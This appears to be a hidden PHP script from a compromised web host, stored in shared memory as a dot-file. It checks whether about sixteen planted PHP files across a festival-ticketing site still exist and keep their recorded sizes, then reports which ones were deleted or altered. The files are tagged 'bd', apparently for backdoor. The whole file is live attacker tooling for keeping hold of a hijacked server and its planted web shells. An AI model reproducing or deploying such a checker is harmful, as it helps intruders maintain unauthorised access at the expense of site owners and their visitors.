File: //dev/shm/.fac
<?php $r = '/home/bvkaynrz/golivestream.live'; $x = ["/sunandbass-2025/wlp.php"=>"bd@@1009697@@908",
"/national-league-2025/forgot_password.php"=>"bd@@1010491@@987",
"/reminisce-festival-2025/item.php"=>"bd@@1010026@@1057",
"/the-miracle-in-mundelein-2025/editsitelang.php"=>"bd@@1010817@@923",
"/belgian-beer-weekend-2025/test3.php"=>"bd@@1011133@@811",
"/index.php"=>"bd@@1016645@@51",
"/belgian-beer-weekend-2025/test3.php"=>"bd@@1017245@@12",
"/national-league-2025/forgot_password.php"=>"bd@@1017778@@93",
"/breakaway-festival-2025/cgi-bin/dividers.php"=>"bd@@1018114@@26",
"/reminisce-festival-2025/item.php"=>"bd@@1018741@@29",
"/neon-prairie-festival-2025/userselect.php"=>"bd@@1019234@@939",
"/decibel-open-air-2025/form_upload.php"=>"bd@@1019711@@962",
"/breakaway-festival-2025/kixtart.php"=>"bd@@1019971@@977",
"/sacred-acre-festival-2025/nsis.php"=>"bd@@1020276@@909",
"/breakaway-festival-2025/cgi-bin/dividers.php"=>"bd@@1008116@@887",
"/scorm.php"=>"bd@@1020603@@972"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');